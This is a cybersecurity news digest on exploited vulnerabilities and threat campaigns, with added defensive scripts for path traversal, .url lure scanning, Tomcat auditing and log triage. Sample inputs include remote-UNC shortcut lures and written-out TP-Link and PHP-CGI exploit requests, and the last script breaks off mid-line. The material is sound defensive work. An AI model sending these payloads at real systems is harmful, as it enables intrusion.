CyberSecurity news


Mandvi@Cyber Security News //
CISA has added three critical Ivanti Endpoint Manager (EPM) flaws to its Known Exploited Vulnerabilities (KEV) catalog, indicating active exploitation in the wild. The affected vulnerabilities are CVE-2024-13159, CVE-2024-13160, and CVE-2024-13161, all absolute path traversal vulnerabilities in the EPM server that allow a remote, unauthenticated attacker to access sensitive information and, from there, compromise the server. Federal agencies have until March 31, 2025, to apply the patches.

CISA urges all organizations, including those in the private sector, to prioritize remediation of these Ivanti EPM vulnerabilities. Security experts warn that delays in patching can lead to full domain compromise, credential theft, and lateral movement by malicious actors. Given the recent history of Ivanti vulnerabilities and the large installed base of Ivanti products, which makes them a prime target, rapid patching and continuous hardening of these systems are essential.
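Absolute path traversal (CWE-36) is the bug class named above: the attacker supplies a full path, or a UNC path, where the application expects a file name relative to its own storage directory, and the application uses it as given. The snippet below is a generic illustration added here, not Ivanti's code, and assumes a hypothetical storage root of /srv/app/files; it shows the common mistake in path joining beside a hardened version.

```python
"""Absolute path traversal (CWE-36): joining a user-supplied path is not enough."""
import posixpath
import re

# Assumed storage root for the illustration; nothing to do with Ivanti's layout.
BASE_DIR = "/srv/app/files"

# Windows drive-letter prefix such as C:\ (also rejected by the hardened form).
DRIVE_RE = re.compile(r"^[A-Za-z]:")


def unsafe_resolve(base, user_path):
    """Vulnerable form: posixpath.join silently discards `base` when
    `user_path` is absolute, so "/etc/passwd" resolves to itself."""
    return posixpath.join(base, user_path)


def safe_resolve(base, user_path):
    """Hardened form: reject absolute, UNC and drive-letter input, normalise
    separators and dot segments, and require the result to stay under `base`."""
    if (not user_path
            or user_path.startswith(("/", "\\"))
            or DRIVE_RE.match(user_path)
            or "\x00" in user_path):
        raise ValueError("absolute, UNC, drive-letter or NUL-containing path rejected")
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, user_path.replace("\\", "/")))
    # After normalisation ".." segments have been folded in, so a simple prefix
    # check on the canonical form is sufficient.
    if candidate != base and not candidate.startswith(base + "/"):
        raise ValueError("path escapes base directory")
    return candidate


if __name__ == "__main__":
    for name in ("report.txt", "/etc/passwd", "..\\..\\etc\\passwd", "\\\\203.0.113.5\\share\\x"):
        print(f"{name!r:32} unsafe -> {unsafe_resolve(BASE_DIR, name)}")
        try:
            print(f"{'':32} safe   -> {safe_resolve(BASE_DIR, name)}")
        except ValueError as exc:
            print(f"{'':32} safe   -> rejected ({exc})")
```

The point to take away is the first function: `posixpath.join` (and `os.path.join`) returns the second argument unchanged whenever it is absolute, so a check that only looks for `..` misses the absolute case entirely.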

Recommended read:
References :
  • BleepingComputer: CISA tags critical Ivanti EPM flaws as actively exploited in attacks
  • : CISA Urges All Organizations to Patch Exploited Critical Ivanti Vulnerabilities
  • www.scworld.com: 3 Ivanti flaws added to CISA list of known exploited vulnerabilities
  • The DefendOps Diaries: Addressing Critical Vulnerabilities in Ivanti Endpoint Manager
  • www.cybersecuritydive.com: CISA: 3 Ivanti endpoint vulnerabilities exploited in the wild
  • Cyber Security News: CISA Adds 3 Ivanti Endpoint Manager Flaws to Exploited Vulnerabilities Catalog

rohann@checkpoint.com@Check Point Blog //
Blind Eagle, one of Latin America's most dangerous cyber criminal groups, has been actively targeting Colombian institutions and government entities since November 2024. According to Check Point Research (CPR), this advanced persistent threat (APT) group, also tracked as APT-C-36, is using sophisticated techniques to bypass traditional security defenses. They leverage trusted platforms like Google Drive, Dropbox, GitHub, and Bitbucket to distribute their malicious payloads, and have recently been seen using a variant of an exploit for a now-patched Microsoft Windows flaw, CVE-2024-43451. This allows them to infect victims with a high rate of success.

CPR has uncovered that Blind Eagle incorporated this exploit a mere six days after Microsoft released the patch. They use malicious .URL files distributed via phishing emails, and victims are often unaware they are triggering the infection. The final payload is often the Remcos RAT, a remote access trojan that grants attackers complete control over infected systems, allowing for data theft, remote execution, and persistent access. In one campaign in December 2024, over 1,600 victims were affected, highlighting the group's efficiency and targeted approach.
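Windows Internet Shortcut (.url) files are plain INI text, so lures of the kind described above can be screened at the mail gateway or on disk for fields that make Windows reach out to a remote host: a file:// or UNC target (including the host@port form that routes through the WebDAV client) or a remote IconFile. The script below is an added example with constructed sample files; it is not Check Point's detection logic and makes no claim about the contents of the campaign's actual lures.

```python
"""Flag Windows Internet Shortcut (.url) files that point at remote resources."""
from urllib.parse import urlsplit

# Constructed sample .url bodies for this example; not Blind Eagle's files.
SAMPLES = {
    "invoice.url": "[InternetShortcut]\r\nURL=file://203.0.113.5/share/invoice.pdf\r\n",
    "report.url":  "[InternetShortcut]\r\nURL=\\\\203.0.113.5@80\\DavWWWRoot\\report.pdf\r\nIconIndex=1\r\n",
    "news.url":    "[InternetShortcut]\r\nURL=https://example.org/news\r\n"
                   "IconFile=\\\\203.0.113.5\\icons\\news.ico\r\nIconIndex=0\r\n",
    "docs.url":    "[InternetShortcut]\r\nURL=https://example.org/docs\r\n"
                   "IconFile=C:\\Windows\\System32\\shell32.dll\r\nIconIndex=3\r\n",
}

# Fields whose value Windows resolves as a path when the shortcut is used or rendered.
PATH_FIELDS = ("url", "iconfile", "workingdirectory")


def parse_url_file(text):
    """Parse the INI-style body into {section: {key: value}} (keys lower-cased)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def remote_host(value):
    """Return the host a path-like value would make Windows contact, or None if local."""
    if value.startswith("\\\\") or value.startswith("//"):
        host = value[2:].split("\\", 1)[0].split("/", 1)[0]
        # host@80 / host@SSL selects the WebDAV redirector; the host is what matters.
        return host.split("@", 1)[0] or None
    parts = urlsplit(value)
    if parts.scheme == "file" and parts.netloc:
        return parts.netloc
    return None


def assess(text):
    """Return [(field, host)] for every field that resolves to a remote host."""
    shortcut = parse_url_file(text).get("internetshortcut", {})
    findings = []
    for field in PATH_FIELDS:
        value = shortcut.get(field)
        if value:
            host = remote_host(value)
            if host:
                findings.append((field, host))
    return findings


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        verdict = assess(body)
        print(f"{name:12} {'REMOTE ' + str(verdict) if verdict else 'local only'}")
```

An https URL in the URL field is left alone because it simply opens a browser; the fields worth flagging are those that the shell resolves through the SMB or WebDAV client before the user has seen anything.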

Recommended read:
References :
  • Check Point Blog: The Growing Danger of Blind Eagle: One of Latin America’s Most Dangerous Cyber Criminal Groups Targets Colombia
  • bsky.app: Blind Eagle APT group has compromised over 1,600 victims inside Colombian institutions and government agencies. The campaign took place in November & December of last year and used an exploit similar to a zero-day exploited by Russian hackers in Ukraine.
  • The Hacker News: The threat actor known as Blind Eagle has been linked to a series of ongoing campaigns targeting Colombian institutions and government entities since November 2024.
  • bsky.app: The Blind Eagle APT group has compromised over 1,600 victims inside Colombian institutions and government agencies. The campaign took place in November & December of last year and used an exploit similar to a zero-day exploited by Russian hackers in Ukraine.
  • gbhackers.com: Blind Eagle Hackers Exploit Google Drive, Dropbox & GitHub to Evade Security Measures
  • : Blind Eagle has been running campaigns targeting the Colombian government with malicious .url files and phishing attacks
  • Talkback Resources: Blind Eagle Hacks Colombian Institutions Using NTLM Flaw, RATs and GitHub-Based Attacks

Matan Mittelman@Cato Networks //
The Ballista botnet is actively exploiting CVE-2023-1389, a remote code execution vulnerability in TP-Link Archer routers, to spread across the internet. Cato Networks' Cato CTRL researchers have uncovered this new IoT threat, linking it to an Italian threat actor due to IP addresses and Italian language strings found in the malware binaries. Since its detection in January 2025, Ballista has targeted organizations in the U.S., Australia, China, and Mexico, impacting sectors like manufacturing, healthcare, technology, and services.

This botnet leverages a vulnerability in TP-Link Archer AX-21 routers that allows unauthorized command execution through manipulated country parameters in router APIs. Despite patches being available, over 6,000 internet-exposed devices remain vulnerable, according to Censys. Once installed, the malware establishes a TLS-encrypted command-and-control (C2) channel on port 82, enabling full device control, DDoS attack execution, and shell command execution. The threat actor is also transitioning to Tor-based C2 domains to complicate tracking and takedowns.

Recommended read:
References :
  • bsky.app: New Ballista botnet found -Author seems to be from Italy -Targets TP-Link Archer routers -Used for DDoS attacks -Unique code, not based on Mirai or Mozi
  • Secure Bulletin: The Ballista Botnet: a new IoT threat with italian roots
  • securityaffairs.com: New Ballista Botnet spreads using TP-Link flaw. Is it an Italian job?
  • Cato Networks: Cato CTRL™ Threat Research: Ballista – New IoT Botnet Targeting Thousands of TP-Link Archer Routers
  • The Hacker News: Ballista Botnet Exploits Unpatched TP-Link Vulnerability, Infects Over 6,000 Devices
  • CyberInsider: TP-Link Archer Routers Under Attack by New IoT Botnet ‘Ballista’
  • Blog: New Ballista botnet targets vulnerabilities in popular TP-Link routers

SC Staff@scmagazine.com //
The Lazarus Group, a North Korean APT, is actively targeting developers through the npm ecosystem by publishing malicious packages. These packages are designed to compromise developer environments, steal credentials, extract cryptocurrency data, and deploy backdoors. The attackers use typosquatting, mimicking legitimate library names to deceive developers into downloading the compromised versions. The packages contain BeaverTail malware and the InvisibleFerret backdoor and exhibit identical obfuscation techniques, cross-platform targeting, and command-and-control mechanisms consistent with previous Lazarus campaigns.

Six malicious npm packages have been identified, including postcss-optimizer, is-buffer-validator, yoojae-validator, event-handle-package, array-empty-validator, and react-event-dependency. These packages have been collectively downloaded over 330 times and contain the BeaverTail malware, which functions as both an infostealer and a loader designed to steal login credentials, exfiltrate sensitive data, and deploy backdoors in compromised systems. The Lazarus Group also maintained GitHub repositories for five of the malicious packages, lending an appearance of open source legitimacy.

Recommended read:
References :
  • The DefendOps Diaries: Lazarus Group's Latest Supply Chain Attacks on Developers
  • BleepingComputer: North Korean Lazarus hackers infect hundreds via npm packages
  • bsky.app: Reports on the six malicious npm packages linked to the Lazarus Group.
  • The Hacker News: The Lazarus Group, a North Korean APT, is actively targeting the npm ecosystem by publishing malicious packages that closely mimic legitimate libraries, deceiving developers into incorporating harmful code into their projects.
  • socket.dev: North Korea’s Lazarus Group continues to infiltrate the npm ecosystem, deploying six new malicious packages designed to compromise developer environments, steal credentials, extract cryptocurrency data, and deploy a backdoor.
  • securityaffairs.com: Lazarus Strikes npm Again with New Wave of Malicious Packages
  • hackread.com: Lazarus Group Hid Backdoor in Fake npm Packages in Latest Attack
  • cyberscoop.com: Lazarus Group deceives developers with 6 new malicious npm packages
  • www.scworld.com: Malware spread by Lazarus Group via counterfeit npm packages

MSSP Alert@MSSP feed for Latest //
Apple has released emergency security updates to address a zero-day vulnerability in WebKit, identified as CVE-2025-24201. The company stated that this flaw was actively exploited in "extremely sophisticated" attacks targeting specific individuals. The vulnerability resided within the WebKit browser engine, which powers Safari and various other applications across macOS, iOS, and other platforms. Exploitation of this flaw allowed attackers to bypass the Web Content sandbox, a critical security feature designed to isolate web processes from the rest of the system, potentially leading to unauthorized actions.

Apple's swift response included patches for iOS 18.3.2, iPadOS 18.3.2, macOS Sequoia 15.3.2, visionOS 2.3.2, and Safari 18.3.1. The vulnerability impacted a wide range of Apple devices, including iPhone XS and later, iPad Pro models, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later, as well as Macs running macOS Sequoia and Apple Vision Pro. The tech giant has so far not disclosed if its own researchers or others outside of the company discovered the vulnerability.

Recommended read:
References :
  • The DefendOps Diaries: Apple's Swift Response to WebKit Zero-Day Vulnerability: CVE-2025-24201
  • BleepingComputer: Apple fixes WebKit zero-day exploited in ‘extremely sophisticated’ attacks
  • securityaffairs.com: Apple fixed the third actively exploited zero-day of 2025
  • CyberInsider: Apple Patches Zero-Day Flaw Used in Targeted iPhone Attacks
  • Threats | CyberScoop: Apple released emergency software patches Tuesday that address a newly identified zero-day vulnerability in the company’s WebKit web browser engine.  Tracked as CVE-2025-24201, an attacker can potentially escape the constraints of Webkit’s Web Content sandbox, potentially leading to unauthorized actions.
  • techcrunch.com: The flaw was in the browser engine WebKit, used by Safari and other apps.
  • bsky.app: Apple has released emergency security updates to patch a zero-day bug the company describes as exploited in "extremely sophisticated" attacks.
  • bsky.app: Apple has released emergency security updates to patch a zero-day bug the company describes as exploited in "extremely sophisticated" attacks.
  • infosec.exchange: NEW: Apple patched a zero-day in WebKit that “may have been exploited in an extremely sophisticated attack against specific targeted individuals.” This is second time, AFAICT, that Apple uses the "extremely sophisticated" phrase for a patched bug.
  • The Hacker News: Apple Releases Patch for WebKit Zero-Day Vulnerability Exploited in Targeted Attacks
  • www.csoonline.com: Apple patches zero-day bugs used in targeted iPhone attacks
  • Blog: FieldEffect blog post on apple-emergency-update-extremely-sophisticated-zero-day.
  • : iOS 18.3.2 Patches Actively Exploited WebKit Vulnerability
  • MSSP feed for Latest: Apple Addresses Actively-Exploited Zero-Day In WebKit Browser Engine

@The DefendOps Diaries //
Microsoft's March 2025 Patch Tuesday addressed 57 flaws, including seven zero-day vulnerabilities: six already being actively exploited and one publicly disclosed before a patch was available. Six of the flaws are rated critical, all of them remote code execution vulnerabilities that could lead to full system compromise if exploited. One notable zero-day is the Windows Win32 Kernel Subsystem elevation of privilege vulnerability (CVE-2025-24983), a race condition that could allow a low-privileged attacker to gain SYSTEM privileges.

Microsoft has also announced that it will drop support for the Remote Desktop app, available through the Microsoft Store, on May 27th. The current app will be replaced with the new Windows App, designed for work and school accounts. Microsoft is encouraging users to review the known issues and limitations of the Windows App to understand any feature gaps that may create challenges during migration. The Windows App is intended to connect to Azure Virtual Desktop, Windows 365, Microsoft Dev Box, Remote Desktop Services, and remote PCs.

Recommended read:
References :
  • isc.sans.edu: Microsoft Patch Tuesday: March 2025, (Tue, Mar 11th)
  • The DefendOps Diaries: Microsoft's March 2025 Patch Tuesday: Addressing Critical Vulnerabilities
  • BleepingComputer: Microsoft March 2025 Patch Tuesday fixes 7 zero-days, 57 flaws
  • CyberInsider: Microsoft March 2025 ‘Patch Tuesday’ Updates Fix Six Actively Exploited Flaws
  • Tenable Blog: Microsoft’s March 2025 Patch Tuesday Addresses 56 CVEs (CVE-2025-26633, CVE-2025-24983, CVE-2025-24993)
  • bsky.app: Today is Microsoft's March 2025 Patch Tuesday, which includes security updates for 57 flaws, including six actively exploited zero-day vulnerabilities.
  • krebsonsecurity.com: Microsoft: 6 Zero-Days in March 2025 Patch Tuesday
  • Blog RSS Feed: March 2025 Patch Tuesday Analysis
  • Threats | CyberScoop: Microsoft patches 57 vulnerabilities, including 6 zero-days
  • The Register - Software: Choose your own Patch Tuesday adventure: Start with six zero-day fixes, or six critical flaws
  • hackread.com: March 2025 Patch Tuesday: Microsoft Fixes 57 Vulnerabilities, 7 Zero-Days
  • www.kaspersky.com: Main vulnerabilities from Microsoft's March Patch Tuesday | Kaspersky official blog
  • Rescana: Microsoft March 2025 Patch Tuesday: Zero-Day Exploitation Analysis in WinDbg, ASP.NET Core, and Remote Desktop
  • socradar.io: March 2025 Patch Tuesday: Microsoft Fixes 6 Critical & 6 Exploited Security Vulnerabilities

info@thehackernews.com@The Hacker News //
The APT group SideWinder is expanding its attacks, now targeting maritime, nuclear, and IT sectors across Asia, the Middle East, and Africa. Previously focused on government, military, and diplomatic institutions, the group has shifted its attention to maritime infrastructure, logistics companies, nuclear power plants, and energy facilities. The attacks, observed by Kaspersky, have spread across multiple countries including Bangladesh, Cambodia, Djibouti, Egypt, the United Arab Emirates, and Vietnam.

Kaspersky experts have noted an increase in attacks on nuclear power plants and energy generation facilities with the attackers utilizing spear-phishing emails and malicious documents containing industry-specific terminology to gain trust. The group exploits an older Microsoft Office vulnerability (CVE-2017-11882) to bypass detection systems and access operational data, research projects, and personnel data. According to Kaspersky researchers Giampaolo Dedola and Vasily Berdnikov, SideWinder constantly works to improve its toolsets, stay ahead of security software detections, extend persistence on compromised networks, and hide its presence on infected systems.

Recommended read:
References :
  • The Register - Security: Sidewinder goes nuclear, charts course for maritime mayhem in tactics shift
  • The Hacker News: SideWinder APT Targets Maritime, Nuclear, and IT Sectors Across Asia, Middle East, and Africa
  • www.it-daily.net: SideWinder now also attacks nuclear power plants
  • securityaffairs.com: SideWinder APT targets maritime and nuclear sectors with enhanced toolset
  • Rescana: Inside the Mind of Sidewinder: A Real-World Look at a Sophisticated Cyber Adversary

Pierluigi Paganini@Security Affairs //
CISA has added multiple vulnerabilities in Advantive VeraCore to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The five flaws impact both Advantive VeraCore and Ivanti Endpoint Manager (EPM) with agencies being urged to apply patches by March 31, 2025.

The VeraCore vulnerabilities, CVE-2024-57968 and CVE-2025-25181, are being exploited by the XE Group, a Vietnamese threat actor, to deploy reverse shells and web shells for persistent remote access. CVE-2024-57968 is an unrestricted file upload vulnerability, while CVE-2025-25181 is an SQL injection vulnerability. There are currently no public reports about how the three Ivanti EPM flaws are being weaponized in real-world attacks.

Recommended read:
References :
  • securityaffairs.com: U.S. CISA adds Advantive VeraCore and Ivanti EPM flaws to its Known Exploited Vulnerabilities catalog
  • The Hacker News: CISA Adds Five Actively Exploited Vulnerabilities in Advantive VeraCore and Ivanti EPM to KEV List
  • Talkback Resources: CISA Adds Five Actively Exploited Vulnerabilities in Advantive VeraCore and Ivanti EPM to KEV List [exp] [ics]
  • www.scworld.com: Advantive VeraCore, Ivanti EPM flaws added to CISA vulnerabilities catalog
  • cyble.com: CISA Adds Five New Vulnerabilities to Its Known Exploited Vulnerabilities Catalog

do son@Cybersecurity News //
A critical security vulnerability, CVE-2025-24813, has been identified in Apache Tomcat, potentially exposing servers to remote code execution (RCE) and data leaks. The vulnerability stems from a path equivalence issue related to how Tomcat handles filenames with internal dots, particularly when writes are enabled for the default servlet and partial PUT support is enabled. This flaw could allow attackers to execute malicious code, disclose sensitive information, or inject malicious content into uploaded files.

Users of Apache Tomcat versions 11.0.0-M1 through 11.0.2, 10.1.0-M1 through 10.1.34, and 9.0.0.M1 through 9.0.98 are advised to upgrade immediately to versions 11.0.3, 10.1.35, or 9.0.99 respectively, which include the fixes. Information disclosure or corruption of uploaded files requires that writes are enabled for the default servlet (disabled by default) and that partial PUT support is enabled (enabled by default). Remote code execution additionally requires that the application uses Tomcat's file-based session persistence with the default storage location and includes a library susceptible to deserialization attacks. COSCo Shipping Lines DIC and sw0rd1ight are credited with discovering and reporting the vulnerability.
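A quick way to see whether an installation meets the preconditions listed above is to read the Tomcat version, conf/web.xml and the context's session manager configuration together. The script below is an added example, not Apache's tooling; the two XML fragments are constructed samples, and the first-fixed versions are the ones named in the advisory.

```python
"""Audit a Tomcat configuration for the CVE-2025-24813 preconditions."""
import re
import xml.etree.ElementTree as ET

# Constructed sample of conf/web.xml with the default servlet made writable
# (a stock install ships readonly=true and no allowPartialPut entry).
SAMPLE_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>debug</param-name><param-value>0</param-value></init-param>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>
"""

# Constructed sample context.xml using file-based session persistence
# without an explicit directory, i.e. the default storage location.
SAMPLE_CONTEXT_XML = """<Context>
  <Manager className="org.apache.catalina.session.PersistentManager">
    <Store className="org.apache.catalina.session.FileStore"/>
  </Manager>
</Context>
"""

# First fixed release per branch, as given in the advisory.
FIXED = {(9, 0): (9, 0, 99), (10, 1): (10, 1, 35), (11, 0): (11, 0, 3)}
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:[.-]M(\d+))?$")


def local(tag):
    """Strip an XML namespace prefix such as {http://xmlns.jcp.org/xml/ns/javaee}."""
    return tag.rsplit("}", 1)[-1]


def parse_version(text):
    """Turn 9.0.98, 9.0.0.M1 or 10.1.0-M1 into a sortable tuple."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Tomcat version: {text!r}")
    major, minor, patch, milestone = m.groups()
    key = (int(major), int(minor), int(patch))
    # Milestones sort before the final release carrying the same number.
    return key + ((0, int(milestone)) if milestone else (1, 0))


def version_is_fixed(text):
    """True/False for a branch named in the advisory, None for other branches."""
    v = parse_version(text)
    fixed = FIXED.get(v[:2])
    if fixed is None:
        return None
    return v >= fixed + (1, 0)


def default_servlet_params(web_xml):
    """Collect the init-params of the servlet named 'default'."""
    params = {}
    for servlet in ET.fromstring(web_xml).iter():
        if local(servlet.tag) != "servlet":
            continue
        names = [c for c in servlet if local(c.tag) == "servlet-name"]
        if not names or (names[0].text or "").strip() != "default":
            continue
        for ip in servlet:
            if local(ip.tag) != "init-param":
                continue
            kv = {local(c.tag): (c.text or "").strip() for c in ip}
            params[kv.get("param-name")] = kv.get("param-value")
    return params


def audit(web_xml, context_xml, version):
    """Return a list of findings; an empty list means none of the preconditions hold."""
    findings = []
    params = default_servlet_params(web_xml)
    writable = params.get("readonly", "true").lower() == "false"
    partial_put = params.get("allowPartialPut", "true").lower() != "false"
    if writable:
        findings.append("default servlet accepts writes (readonly=false)")
    if writable and partial_put:
        findings.append("partial PUT is enabled together with writes")
    for store in ET.fromstring(context_xml).iter():
        if local(store.tag) == "Store" and store.get("className", "").endswith(".FileStore"):
            where = store.get("directory") or "default location"
            findings.append(f"file-based session persistence in use ({where})")
    if version_is_fixed(version) is False:
        findings.append(f"Tomcat {version} predates the fix")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_WEB_XML, SAMPLE_CONTEXT_XML, "9.0.98"):
        print("-", finding)
```

On a real host point the script at conf/web.xml, the application's META-INF/context.xml (or conf/context.xml) and the version string from `catalina.sh version`; a FileStore finding on its own is not exploitable, but combined with writes and partial PUT on an unpatched build it is the full chain.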

Recommended read:
References :
  • gbhackers.com: Apache Tomcat Flaw Could Allow RCE Attacks on Servers
  • cR0w :cascadia:: Tomcat vulns are always fun, right? H/T: Path Equivalence: 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat.
  • buherator's timeline: [oss-security] CVE-2025-24813: Apache Tomcat: Potential RCE and/or information disclosure and/or ...
  • Open Source Security: CVE-2025-24813: Apache Tomcat: Potential RCE and/or information disclosure and/or information corruption with partial PUT
  • securityonline.info: CVE-2025-24813 Flaw in Apache Tomcat Exposes Servers to RCE, Data Leaks: Update Immediately
  • buherator's timeline: Analysis of CVE-2025-24813 Apache Tomcat Path Equivalence RCE

Thomas Brewster@Thomas Fox-Brewster //
Bybit, a cryptocurrency exchange, suffered a massive loss of $1.5 billion due to North Korean hackers, marking a record-breaking heist. Investigations revealed the breach stemmed from a compromised account on a free digital storage service, highlighting the vulnerabilities even established crypto platforms face. Law enforcement agencies are now engaged in a cat-and-mouse game to recover the stolen cryptocurrency before it is converted into untraceable currency.

This incident underscores the growing threat of sophisticated cyberattacks targeting the cryptocurrency sector. North Korean hackers, specifically the Lazarus Group, are believed to be responsible for the attack. Concerns remain about the security measures implemented by cryptocurrency exchanges and the need for stronger protocols to safeguard user funds from these types of breaches.

Recommended read:
References :
  • Thomas Fox-Brewster: Feds Suspect LastPass Hackers Stole $150 Million In Crypto From One Person
  • fortune.com: How North Korea cracked Bybit’s crypto safe to steal $1.5 billion in a record heist
  • News ? Metro: North Korean hackers cash out £300,000,000 after billion-pound crypto heist
  • Virus Bulletin: NCC Group's Mario Rivas, Ruben Santos & Jorge Sanz present a technical analysis of the Bybit hack that led to the largest cryptocurrency theft ever recorded, with more than $1.4 billion assets, including 401,347 ETH, drained from its cold wallet.
  • Kaspersky official blog: How to store cryptocurrency after the Bybit hack | Kaspersky official blog

Dissent@DataBreaches.Net //
New York Attorney General Letitia James has filed a lawsuit against Allstate Insurance and National General Insurance for allegedly failing to protect the personal information of New York residents. The lawsuit stems from data breaches in 2020 and 2021 that exposed the driver's license numbers of over 165,000 New Yorkers. The Attorney General's office claims that National General's online auto insurance quoting tools were intentionally designed to display consumers' full driver's license numbers in plain text, making them easily accessible to attackers.

The breaches occurred because the company failed to adequately encrypt and secure databases containing personal information. Attackers exploited vulnerabilities in Allstate's National General business unit's websites. The first breach went undetected for two months, and the company allegedly failed to notify affected consumers or relevant state agencies. A second, larger breach occurred due to continued security weaknesses. Attorney General James seeks penalties and an injunction to prevent further violations.

Recommended read:
References :
  • DataBreaches.Net: NEW YORK – New York Attorney General Letitia James today filed a lawsuit against several insurance companies doing business as National General and Allstate Insurance Company (Allstate) for failing to protect New Yorkers’ personal information from cyberattacks.
  • The Register - Security: Crooks built bots to exploit astoundingly bad quotation website and made off with data on thousands New York State has sued Allstate Insurance for operating websites so badly designed they would deliver personal information in plain-text to anyone that went looking for it.
  • www.scworld.com: New York attorney general hits Allstate with suit over data breaches
  • The Register: Allstate Insurance sued for delivering personal info on a platter, in plaintext, to anyone who went looking for it
  • www.infosecurity-magazine.com: New York sues Allstate Over Data Breach and Security Failures
  • www.techradar.com: Allstate sued for exposing personal customer information in plaintext
  • CyberScoop: New York sues Allstate and subsidiaries for back-to-back data breaches

Sunny Yadav@eSecurity Planet //
A large-scale cryptocurrency miner campaign is currently targeting Russian users, employing the SilentCryptoMiner malware. The malware disguises itself as a legitimate tool designed to bypass internet restrictions, enticing users to download and install it. This campaign has already affected over 2,000 Russian users, who were tricked into downloading fake VPN and DPI bypass tools.

The attackers are distributing the malware through popular YouTube channels, with some boasting over 60,000 subscribers. The malicious files are presented as safe tools, while in reality, the archive contains a Python-based loader that retrieves the miner payload. To further their deception, attackers instruct victims to disable their antivirus programs, falsely claiming they trigger false positives, further exposing their systems to persistent, hidden threats.

Recommended read:
References :
  • securityaffairs.com: Large-scale cryptocurrency miner campaign targets Russian users with SilentCryptoMiner
  • thehackernews.com: SilentCryptoMiner infects 2,000 Russian users via fake VPN and DPI Bypass Tools
  • eSecurity Planet: SilentCryptoMiner Infects 2,000 Russian Users via Fake VPN Tools

@cyberalerts.io //
Davis Lu, a 55-year-old software developer from Houston, Texas, has been convicted in federal court for sabotaging the computer systems of his former employer, Eaton Corp, after a demotion in 2018 led to reduced responsibilities and system access. Lu, who worked for the company from November 2007 to October 2019, introduced malicious code onto the company's production systems starting in August 2019. This code included "infinite loops" designed to exhaust Java threads, causing system crashes and preventing user logins. Lu also wrote code to delete coworker profile files and implemented a "kill switch" that would lock out all users if his credentials in the company's active directory were disabled.

The "kill switch," named "IsDLEnabledinAD" (abbreviating "Is Davis Lu enabled in Active Directory"), was automatically activated upon his termination on Sept. 9, 2019, impacting thousands of company users globally. Additional code was named "Hakai," meaning "destruction" in Japanese, and "HunShui," meaning "sleep" or "lethargy" in Chinese. On the day he was directed to turn in his company laptop, Lu deleted encrypted data and his internet search history revealed that he had researched methods to escalate privileges, hide processes, and rapidly delete files, indicating an intent to obstruct efforts of his co-workers to resolve the system disruptions. Lu now faces a maximum penalty of 10 years in prison for causing intentional damage to protected computers.

Recommended read:
References :
  • DataBreaches.Net: Texas Man Convicted of Sabotaging his Employer’s Computer Systems and Deleting Data
  • The Register - Software: Developer sabotaged ex-employer with kill switch activated when he was let go
  • www.bleepingcomputer.com: Developer guilty of using kill switch to sabotage employer's systems
  • bsky.app: BSky Post on Sabotaging
  • BleepingComputer: A software developer has been found guilty of sabotaging his ex-employer's systems by running custom malware and installing a "kill switch" after being demoted at the company.
  • : Software developer Davis Lu cost his employer hundreds of thousands after deploying malware that caused crashes and failed logins
  • Tech Monitor: Texas software developer found guilty of sabotaging corporate network
  • PCMag UK security: Developer Found Guilty of Adding 'Kill Switch' to Company Network
  • Policy ? Ars Technica: Developer convicted for “kill switch” code activated upon his termination
  • Tech Monitor: A federal jury in Cleveland convicted a former software developer for deliberately disrupting the computer systems of his former employer.

Sergiu Gatlan@BleepingComputer //
Cybersecurity experts are warning of mass exploitation of a critical PHP vulnerability, CVE-2024-4577. The flaw affects PHP running in CGI mode on Windows and allows attackers to execute code remotely on vulnerable servers using Apache and PHP-CGI. GreyNoise data confirms that exploitation extends far beyond initial reports, with attack attempts observed across multiple regions and notable spikes in the United States, Singapore, Japan, and other countries throughout January 2025, signaling a broad campaign against this vulnerability.

Cisco Talos has separately documented an attacker exploiting CVE-2024-4577 to gain access to victim machines and carry out post-exploitation activities. GreyNoise detected over 1,000 attacks globally. Experts urge organizations to apply the available patches and monitor for suspicious activity to mitigate the risk of compromise.
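Both this PHP-CGI campaign and the Ballista activity described earlier on this page leave recognisable traces in web access logs: for CVE-2024-4577 a percent-encoded soft hyphen (`%AD`) directly before an option letter, which Windows best-fit mapping turns into `-` so that `-d` style arguments reach php-cgi; for CVE-2023-1389 shell metacharacters in the `country` field of the TP-Link locale API. The script below is an added example, not code from Cato, Talos or GreyNoise; the log lines are constructed, and the `/cgi-bin/luci/;stok=/locale` path reflects the public proof-of-concept for the TP-Link flaw rather than anything stated on this page.

```python
"""Access-log triage for CVE-2023-1389 (TP-Link) and CVE-2024-4577 (PHP-CGI) patterns."""
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Common Log Format; they are not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [11/Mar/2025:10:00:01 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id) HTTP/1.1" 200 12
203.0.113.11 - - [11/Mar/2025:10:00:02 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=read HTTP/1.1" 200 56
198.51.100.7 - - [11/Mar/2025:10:00:03 +0000] "GET /index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 0
198.51.100.8 - - [11/Mar/2025:10:00:04 +0000] "GET /index.php?q=co%C2%ADoperation HTTP/1.1" 200 310
"""

LINE_RE = re.compile(
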